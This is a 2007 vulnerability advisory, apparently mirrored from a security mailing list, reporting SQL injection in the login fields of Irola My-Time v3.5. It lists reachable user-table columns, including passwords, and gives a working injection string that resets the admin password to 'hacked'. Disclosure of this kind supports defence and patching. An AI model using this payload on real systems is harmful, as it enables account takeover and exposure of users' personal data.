The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Aria-Security.net: Irola My-Time v3.5 SQL Injection


<< Previous INDEX Search src / Print Next >>
Date: 23 Nov 2007 09:53:35 -0000
From: [email protected]
To: [email protected]
Subject: Aria-Security.net: Irola My-Time v3.5 SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Aria-Security Team
http://Aria-Security.Net
-----------------------------
Original Advisory (and more details) @ http://aria-security.net/forum/showthread.php?p=1106
Irola My-Time v3.5
http://www.irola.com


Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:

UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone



Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--

MORE HELP AT the Original Page.

Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру